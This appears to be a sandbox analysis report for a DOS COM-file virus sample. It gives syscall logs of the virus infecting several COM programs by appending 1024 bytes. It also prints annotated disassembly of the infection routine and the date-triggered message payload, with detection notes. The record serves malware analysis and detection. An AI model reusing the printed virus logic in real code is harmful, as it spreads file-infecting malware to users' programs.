Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.Ear.1024.a


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:14:01.129688559Z 26 PC: 12ac8 | Set disk transfer address
2018-12-17T22:14:01.131857038Z 71 PC: 12ada | Get current directory
2018-12-17T22:14:01.134621912Z 78 PC: 12b9e | Find first file
2018-12-17T22:14:01.140466431Z 78 PC: 12b9e | Find first file
2018-12-17T22:14:01.14700892Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:14:01.153913779Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.160271Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.16234344Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:14:01.170306514Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.172953216Z 66 PC: 12c90 | Move file pointer
; Disassembly window printed after DOS "Get time" (int 21h, AH=2Ch) returns; on return CH=hour, CL=minute.
; It patches two clock-derived words into the block at bp+0x103 and then assembles a 30-byte
; sequence at bp+0x570 (1 + 16 + 1 + 11 + 1 bytes). In the log this sits between the 3-byte write
; at the start of the opened .COM file and the 1024-byte write at PC 12ef3.
; NOTE(review): bp is presumably the virus's delta offset; the instruction that sets it is not shown - confirm.
2018-12-17T22:14:01.174262597Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx ; store the raw hour:minute word at block offset +0x10c
0x12c98: and cx, 0x1f ; keep the low 5 bits of the minute (0..31)
0x12c9b: add cx, 0x200 ; cx is now 0x200..0x21f
0x12c9f: mov word ptr [bp + 0x107], cx ; second patched word; presumably a count/length operand for the copied code - TODO confirm
0x12ca3: lea di, word ptr [bp + 0x570] ; di = destination buffer for the assembled bytes
0x12ca7: mov al, 0x53 ; 0x53 is the one-byte encoding of "push bx"
0x12ca9: stosb byte ptr es:[di], al ; emit it as the first output byte
0x12caa: lea si, word ptr [bp + 0x103] ; source = block holding the two words patched above (+0x107, +0x10c)
0x12cae: push si ; saved; not popped inside this window
0x12caf: mov cx, 0x10 ; copy length = 16 bytes (0x103..0x112)
0x12cb2: push cx ; saved; restored by the pop at 0x12cc4
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si] ; copy the 16-byte block, including both time-derived words
0x12cb5: mov al, 0x5b ; 0x5b is the one-byte encoding of "pop bx"
0x12cb7: stosb byte ptr es:[di], al ; emit it after the copied block
0x12cb8: lea si, word ptr [bp + 0x4f7] ; second source region
0x12cbc: mov cx, 0xb ; copy length = 11 bytes
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si] ; append those 11 bytes
0x12cc1: mov al, 0x53 ; "push bx" again
0x12cc3: stosb byte ptr es:[di], al ; final byte of the 30-byte sequence
0x12cc4: pop cx ; cx = 0x10 again; its later use lies outside this window
; NOTE(review): because two words of the copied block come from the clock, the assembled bytes
; differ between infections; the fixed 0x53/0x5b bytes and the open/read 26/write 3/seek/write 1024/
; set-timestamp/set-attributes call sequence in the log are the stable indicators here.
2018-12-17T22:14:01.177774299Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.292221023Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.294057209Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.302812651Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.312851798Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.316508888Z 61 PC: 12d18 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:14:01.324137812Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.330648677Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.332537812Z 61 PC: 12d18 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:14:01.339087801Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.342088029Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.343317706Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.345849549Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.354998393Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.356399079Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.363746606Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.374076266Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.376598265Z 61 PC: 12d18 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:14:01.383438896Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.390083825Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.39231846Z 61 PC: 12d18 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:14:01.399237786Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.402955678Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.404605532Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.407534272Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.417169104Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.419048831Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.426679549Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.439120406Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.442659916Z 61 PC: 12d18 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:14:01.451165697Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.459263844Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.462323498Z 61 PC: 12d18 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:14:01.469664616Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.472768396Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.475439399Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.478004708Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.486646925Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.488729791Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.496820435Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.5066672Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.510487042Z 61 PC: 12d18 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:14:01.517262413Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.523666405Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.526103084Z 61 PC: 12d18 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:14:01.532905375Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.535878051Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.538496413Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.541202986Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.550408848Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.552401803Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.560378991Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.57031991Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.573403649Z 61 PC: 12d18 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:14:01.580853015Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.586918732Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.588884386Z 61 PC: 12d18 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:14:01.595872936Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.598508914Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.600048162Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.603479666Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.612239221Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.613887911Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.622506335Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.632275812Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.635315958Z 61 PC: 12d18 | Open file (Filename = 'PAH.COM')
2018-12-17T22:14:01.642847765Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.64914844Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.651039823Z 61 PC: 12d18 | Open file (Filename = 'PAH.COM')
2018-12-17T22:14:01.658365222Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.661078036Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.662575461Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.666346102Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.675675942Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.6773119Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.685498675Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.695186003Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.699074369Z 61 PC: 12d18 | Open file (Filename = 'TEST.COM')
2018-12-17T22:14:01.707074786Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.709715831Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.711461533Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.714270248Z 59 PC: 12af7 | Change current directory
2018-12-17T22:14:01.718131056Z 59 PC: 12b01 | Change current directory
; Disassembly window printed after DOS "Get date" (int 21h, AH=2Ah) returns; on return DL = day of month.
; This is the payload trigger check: day must be 1, then a time-based check selects a message.
; NOTE(review): the listing appears to be a linear disassembly of the bytes after the return
; address, not the executed path. In this run the next logged call is op 26 at PC 12b69 and no
; op 44 at 12b0e is logged, so the jne at 0x12b08 was evidently taken and the rest did not run.
2018-12-17T22:14:01.721937057Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1 ; is it the 1st of the month?
0x12b08: jne 0x12b5c ; no -> skip the payload
0x12b0a: mov ah, 0x2c ; AH=2Ch: DOS "Get time"
0x12b0c: int 0x21 ; on return DL = hundredths of a second
0x12b0e: cmp dl, 0x55 ; compare hundredths with 85
0x12b11: jg 0x12b5c ; above 85 -> skip (signed compare; harmless for a 0..99 value)
0x12b13: and dx, 7 ; clears DH and keeps hundredths & 7 -> index 0..7
0x12b16: shl dl, 1 ; index * 2 = byte offset into a word table
0x12b18: mov bx, bp ; bx = base (bp presumably the delta offset - confirm)
0x12b1a: add bx, dx ; bx = base + table offset
0x12b1c: mov dx, word ptr [bx + 0x3b4] ; load the selected entry from the 8-entry word table at bp+0x3b4
0x12b20: add dx, bp ; relocate the entry to a run-time address
0x12b22: inc dx ; skip the entry's first byte; the text starts one byte in
0x12b23: push dx ; keep the text pointer for the second print
0x12b24: mov ah, 9 ; AH=09h: DOS "Display string" ($-terminated)
0x12b26: lea dx, word ptr [bp + 0x40c] ; fixed leading message
0x12b2a: int 0x21 ; print it
0x12b2c: pop dx ; dx = selected table string
0x12b2d: int 0x21 ; print it; relies on AH still being 9 from the previous call
0x12b2f: dec dx ; step back to the entry's first byte (use not visible in this window)
2018-12-17T22:14:01.725299935Z 26 PC: 12b69 | Set disk transfer address
2018-12-17T22:14:01.726408211Z 9 PC: 12a67 | Display string (String= 'This is a tiny COM program. ')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:12.402720569Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:12.404949374Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:12.408657411Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:12.41537797Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:12.4222991Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:12.428953257Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:12.435122959Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:12.442779434Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.453810064Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:12.461424003Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:12.465917338Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:12.4689992Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:12.484366592Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:12.486148885Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:12.494328661Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:12.50416885Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.506747962Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.513609661Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.520317115Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.522277649Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.529617779Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.533141149Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.53501145Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.539672565Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.548889216Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.550424725Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.559305093Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.56908877Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.571443273Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.579350391Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.585948834Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.588164648Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.595810989Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.598873232Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.601301966Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.604967471Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.614166121Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.616050742Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.623564544Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.630230695Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.632084012Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.636214181Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.640870651Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.642330065Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.646916824Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.650639012Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.652460045Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.655484418Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.665542154Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.667443201Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.675556453Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.685891943Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.688878271Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.695724832Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.702810743Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.705356716Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.712396371Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.715560147Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.718501015Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.721343619Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.730742472Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.733314061Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.741531867Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.751395507Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.755044774Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.761681639Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.768094226Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.770967082Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.777507953Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.780351854Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.782634001Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.785300279Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.7923001Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.793895552Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.798734637Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.806985787Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.809130988Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.813569323Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.817495699Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.819358319Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.823544551Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.825371377Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.826929005Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.829041536Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.834481483Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.836110702Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.840863791Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.846866872Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.849122642Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.856098334Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.85996107Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.861820528Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.863578351Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:12.869281414Z 59 PC: 12b01 | Change current directory
2018-12-25T11:46:12.872591522Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1
0x12b08: jne 0x12b5c
0x12b0a: mov ah, 0x2c
0x12b0c: int 0x21
0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
2018-12-25T11:46:12.87428965Z 26 PC: 12b69 | Set disk transfer address
2018-12-25T11:46:12.875135877Z 9 PC: 12a67 | Display string (String= 'This is a tiny COM program. ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:13.635804177Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:13.637253023Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:13.639568993Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:13.643585045Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:13.650851017Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:13.65544328Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:13.662578699Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:13.66441005Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.672212239Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:13.67525811Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:13.676764089Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:13.680552224Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:13.697076025Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:13.699191806Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:13.708349161Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:13.719434827Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.722322139Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.730396735Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.737469355Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.739505884Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.746997307Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.750277531Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.751862772Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.754731786Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.764865278Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.766724954Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.775590927Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.788261245Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.791291118Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.798476307Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.805950197Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.808493533Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.815989246Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.819958005Z 66 PC: 12c90 | Move file pointer (See above)
